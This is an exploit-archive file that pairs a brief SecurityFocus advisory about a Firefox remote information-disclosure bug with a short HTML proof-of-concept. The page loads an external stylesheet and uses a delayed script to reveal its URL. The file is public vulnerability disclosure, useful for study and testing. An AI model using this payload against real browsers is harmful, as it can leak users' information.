exploit-db-mirror/platforms/multiple/remote/33664.html
Offensive Security 32619a65bd Updated 06_09_2014
2014-06-09 04:36:29 +00:00

7 lines
No EOL
472 B
HTML
Executable file

source: http://www.securityfocus.com/bid/38369/info
Mozilla Firefox is prone to a remote information-disclosure vulnerability.
Attackers can exploit this issue to obtain potentially sensitive information that may lead to further attacks.
<link rel="stylesheet" type="text/css" href="http://www.example.com"> Hola <script language="javascript"> setTimeout("alert(document.styleSheets[0].href)", 10000); //setTimeout is used just to wait for page loading </script>